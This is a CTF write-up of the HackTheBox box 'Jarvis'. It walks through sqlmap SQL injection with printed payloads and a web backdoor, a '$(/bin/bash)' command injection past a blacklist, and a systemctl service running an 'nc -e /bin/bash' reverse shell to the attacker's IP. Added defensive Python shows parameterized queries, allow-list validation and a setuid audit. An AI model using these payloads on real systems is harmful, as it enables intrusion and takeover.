Jarvis

Jarvis is a medium difficulty CTF on HackTheBox. This box consists of some SQL injection to gain initial access, then exploitation of a python script to get user access and ends by exploiting a Linux service.

[RECON]

Basic Nmap to get things started.

nmap -A 10.10.10.143
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-26 12:21 GMT
Nmap scan report for 10.10.10.143
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.76 seconds

The Nmap results show that there is an HTTP service running on port 80, so I went and had a look at that.

After looking around the website a little I went straight to Gobuster to look for any hidden directories.

gobuster dir -u 10.10.10.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.143
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/02/26 12:24:06 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 313] [--> http://10.10.10.143/images/]                                                                         
/css                  (Status: 301) [Size: 310] [--> http://10.10.10.143/css/]                                                                            
/js                   (Status: 301) [Size: 309] [--> http://10.10.10.143/js/]
/fonts                (Status: 301) [Size: 312] [--> http://10.10.10.143/fonts/]                                                                          
/phpmyadmin           (Status: 301) [Size: 317] [--> http://10.10.10.143/phpmyadmin/]                                                                     
Progress: 39849 / 220561 (18.07%)

I found this phpmyadmin webpage.

[WWW-DATA SHELL]

Looking around for vulnerabilities in phpMyAdmin didn’t really get me anywhere, so I started looking around the website instead. A lot of the links on the website didn’t work, but there was a page at /room.php?cod=1 which, after a little testing, was clearly vulnerable to SQL injection, so I booted up sqlmap to see if I could get a shell.

sqlmap -u http://10.10.10.143/room.php?cod=1 --os-shell
        ___
       __H__                                                                 
 ___ ___[,]_____ ___ ___  {1.6.7#stable}                                     
|_ -| . [(]     | .'| . |                                                    
|___|_  [']_|_|_|__,|  _|                                                    
      |_|V...       |_|   https://sqlmap.org                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:31:08 /2023-02-26/

[12:31:08] [INFO] resuming back-end DBMS 'mysql'
[12:31:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=qf5ls6un6s7...qo38j0jto6'). Do you want to use those [Y/n]
[12:31:12] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 3821=3821

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 8277 FROM (SELECT(SLEEP(5)))IVTb)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-3100 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786b71,0x4c4c7371524a72584b6b6e77654f5473644f68466a79774355506269586f68534d794756744a7751,0x7171627871),NULL-- -
---
[12:31:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[12:31:12] [INFO] going to use a web backdoor for command prompt
[12:31:12] [INFO] fingerprinting the back-end DBMS operating system
[12:31:12] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[12:31:13] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
>
[12:31:14] [INFO] retrieved web server absolute paths: '/images/'
[12:31:14] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method                                                  
[12:31:14] [WARNING] unable to upload the file stager on '/var/www/'
[12:31:14] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[12:31:15] [WARNING] expect junk characters inside the file as a leftover from UNION query
[12:31:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[12:31:15] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[12:31:15] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://10.10.10.143:80/tmpubryr.php                                
[12:31:15] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://10.10.10.143:80/tmpbwred.php                                   
[12:31:15] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'www-data'
os-shell>

It worked! This shell gave me some difficulties, however: there wasn’t really anything I could do with it. After some playing about with it I found that I could get a reverse shell using netcat.
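To show the defect behind the cod parameter in a form that runs offline, here is an added Python example (my own, not code from the Jarvis box or from this writeup): a throwaway SQLite table standing in for the hotel's room lookup, the string-concatenation pattern that makes sqlmap's boolean-blind and UNION payloads work, and the parameterized form that neutralizes them. The table layout, the second users table and its placeholder password are constructed assumptions; the real Stark Hotel schema is not on this page.

```python
import sqlite3

# Constructed sample data; the real Stark Hotel schema is not known from the writeup.
ROOMS = [(1, "Superior Family", 299), (2, "Suite", 499), (3, "Single", 149)]
USERS = [("admin", "placeholder-not-a-real-secret")]


def make_db():
    """In-memory database with a room table and a second table an attacker would want."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE room (cod INTEGER, name TEXT, price INTEGER)")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO room VALUES (?, ?, ?)", ROOMS)
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def room_vulnerable(con, cod):
    """The pattern sqlmap exploited: the request parameter is spliced into SQL text."""
    sql = "SELECT cod, name, price FROM room WHERE cod=" + cod
    return con.execute(sql).fetchall()


def room_safe(con, cod):
    """Hardened form: coerce to the expected type, then bind as a parameter.

    A value such as '1 AND 3821=3821' fails int() and never reaches the database;
    even if it did, a bound parameter is data, not query text.
    """
    cod_int = int(cod)  # raises ValueError for anything that is not an integer literal
    return con.execute(
        "SELECT cod, name, price FROM room WHERE cod=?", (cod_int,)
    ).fetchall()


def safe_rejects(con, cod):
    """True when the hardened lookup refuses the value instead of querying with it."""
    try:
        room_safe(con, cod)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    # Boolean-based blind: a true condition keeps the row, a false one drops it,
    # which is how sqlmap asks the database yes/no questions one bit at a time.
    print(room_vulnerable(con, "1 AND 3821=3821"))
    print(room_vulnerable(con, "1 AND 3821=3822"))
    # UNION: a non-matching cod plus a second SELECT pulls rows from another table.
    print(room_vulnerable(con, "-1 UNION ALL SELECT 0, username, password FROM users"))
    # The parameterized lookup answers only the legitimate query and rejects the rest.
    print(room_safe(con, "1"), safe_rejects(con, "1 AND 3821=3821"))
```

The two sqlmap techniques in the output above (boolean-based blind and UNION) both depend on the parameter being interpreted as SQL; once the value is type-checked and bound, the same strings are either rejected up front or treated as a literal that matches nothing.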

From there I was able to spawn a /bin/bash terminal using the following commands:

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@jarvis:var/www/html$ export TERM=screen
export TERM=screen
www-data@jarvis:var/www/html$ clear

[USER SHELL]

Once I had user access to www-data, I started with a simple sudo -l to look at what privileges I had.

www-data@jarvis:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

This showed an interesting script, simpler.py, that I could run as the user pepper without needing a password. So I tried running the script and looking at the code:

www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
yudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************


********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP

www-data@jarvis:/var/www/html$
import os

def exec_ping():
    # Blacklist of shell metacharacters; note that '$', '(' and ')' are not on it
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    # The unvalidated input is concatenated straight into a shell command
    os.system('ping ' + command)

In all of this code I found this exec_ping function, which is called when the user chooses the -p option to ping an attacker IP. There was a problem, though: a number of characters are forbidden and cannot be used. Luckily the bash command-substitution syntax $( ) was not on the forbidden list, so I was able to use it to get a shell as the user pepper.

www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
y -p -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(/bin/bash)
$(/bin/bash)
pepper@jarvis:/var/www/html$

From this point, I used another netcat listener to get a shell for pepper and grab the user flag.
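The blacklist in exec_ping fails because it enumerates bad characters instead of describing good input. The following is an added Python example (my own, not simpler.py or code from the writeup) that puts the original filter's decision beside an allow-list replacement: the input must parse as an IP address, and ping is started with an argv list rather than through a shell. The argument names and the "-c 1" flag are my choices, not taken from the page.

```python
import ipaddress
import subprocess

# The blacklist exactly as it appears in simpler.py's exec_ping
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blacklist_allows(text):
    """Decision of the original filter: True means the string would reach os.system()."""
    return not any(token in text for token in FORBIDDEN)


def build_argv(text):
    """Allow-list replacement for the blacklist.

    Returns the argv list for a single ping, or None when the input is not a
    bare IP address. ipaddress.ip_address() accepts nothing but an IPv4/IPv6
    literal, so command substitution, extra flags and stray words are all
    rejected before any process is started.
    """
    try:
        ip = ipaddress.ip_address(text.strip())
    except ValueError:
        return None
    return ["ping", "-c", "1", str(ip)]


def exec_ping_hardened(text):
    """Runs ping without a shell; returns the CompletedProcess, or None if rejected.

    Passing an argv list to subprocess.run means no shell ever parses the
    arguments, so even a string like '$(/bin/bash)' would be an inert literal;
    the validation in build_argv stops it earlier anyway.
    """
    argv = build_argv(text)
    if argv is None:
        print("Got you")
        return None
    return subprocess.run(argv, capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    for candidate in ["10.10.14.4", "$(/bin/bash)", "8.8.8.8 -c 100", "::1"]:
        print(f"{candidate!r}: blacklist allows={blacklist_allows(candidate)} "
              f"argv={build_argv(candidate)}")
```

Running the block shows the gap directly: the blacklist lets "$(/bin/bash)" through while build_argv returns None for it, and only plain addresses produce an argv list.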

[GETTING ROOT]

Once I had access to the user pepper it was time to escalate to root privileges. To look for privilege escalation vulnerabilities I downloaded LinEnum.sh and then ran it.

pepper@jarvis:/var/www/html$ wget 10.10.14.4/LinEnum.sh
wget 10.10.14.4/LinEnum.sh
--2023-02-26 08:29:01--  http://10.10.14.4/LinEnum.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh            0%[                    ]       0  --.-KB/s             
LinEnum.sh          100%[===================>]  45.54K  --.-KB/s    in 0.05s   

2023-02-26 08:29:01 (955 KB/s) - 'LinEnum.sh' saved [46631/46631]

From running LinEnum.sh, I found that systemctl had the SUID bit set, which looked like a potential privilege escalation vector.

From this finding I went straight to GTFOBins. If you haven’t used this website before, I would highly recommend checking it out: it is probably one of the best websites for practical information on how Unix binaries can be abused, and I have used it in a number of CTFs for privilege escalation. Searching for systemctl on GTFOBins shows how to create a Linux service, and with this I was able to start another netcat listener and get a root shell when the service runs.

[Service]
Type=notify
ExecStart=/bin/bash -c "nc -e /bin/bash 10.10.14.4 4446"
KillMode=process
Restart=on-failure
RestartSec=42s
[Install]
WantedBy=multi-user.target


After running the created service I got root!
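Both privilege-escalation steps on this box come from configuration an administrator can audit: a NOPASSWD sudo rule that hands a script to another account, and a setuid systemctl. Here is an added Python example (my own, not part of the writeup or LinEnum.sh) that checks for both: it walks the usual binary directories for setuid files and flags any that appear on a list of GTFOBins-documented binaries, and it parses sudo -l output for NOPASSWD rules. The GTFOBins subset is a constructed list, and the sudo -l text embedded below is the output shown earlier on this page, used as sample input.

```python
import os
import re
import stat

# Constructed subset of binaries GTFOBins documents as abusable when setuid
# (systemctl is the one found on Jarvis); extend to taste.
GTFOBINS_SUID = {
    "systemctl", "bash", "sh", "env", "find", "vim", "python", "python3",
    "perl", "cp", "mv", "less", "more", "awk", "nmap", "docker",
}

# sudo -l output from the writeup, embedded here as sample input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
"""

RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:\s*)?(?P<command>.+?)\s*$"
)


def classify_suid(path, mode):
    """None if not setuid; 'gtfobins' if setuid and on the abusable list; else 'suid'."""
    if not (mode & stat.S_ISUID):
        return None
    return "gtfobins" if os.path.basename(path) in GTFOBINS_SUID else "suid"


def scan_suid(dirs=("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")):
    """Walk the usual binary directories and report setuid regular files."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        with os.scandir(d) as entries:
            for entry in entries:
                try:
                    st = entry.stat(follow_symlinks=False)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                verdict = classify_suid(entry.path, st.st_mode)
                if verdict:
                    findings.append((entry.path, verdict))
    return findings


def parse_sudo_l(text):
    """Extract runas / NOPASSWD / command from the rule lines of 'sudo -l' output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": m.group("nopasswd") is not None,
                "command": m.group("command"),
            })
    return rules


def risky_sudo_rules(rules):
    """Rules that run something under another account with no password prompt."""
    return [r for r in rules if r["nopasswd"]]


if __name__ == "__main__":
    for path, verdict in scan_suid():
        print(f"{verdict:9} {path}")
    for r in risky_sudo_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("NOPASSWD", r["runas"], r["command"])
```

On a host like Jarvis the scan would list systemctl under "gtfobins" and the sudo parser would surface the pepper rule for simpler.py; either finding on its own is worth a ticket, and the fix for both is the same (remove the setuid bit, drop NOPASSWD or restrict the script's inputs) rather than trying to filter shell metacharacters.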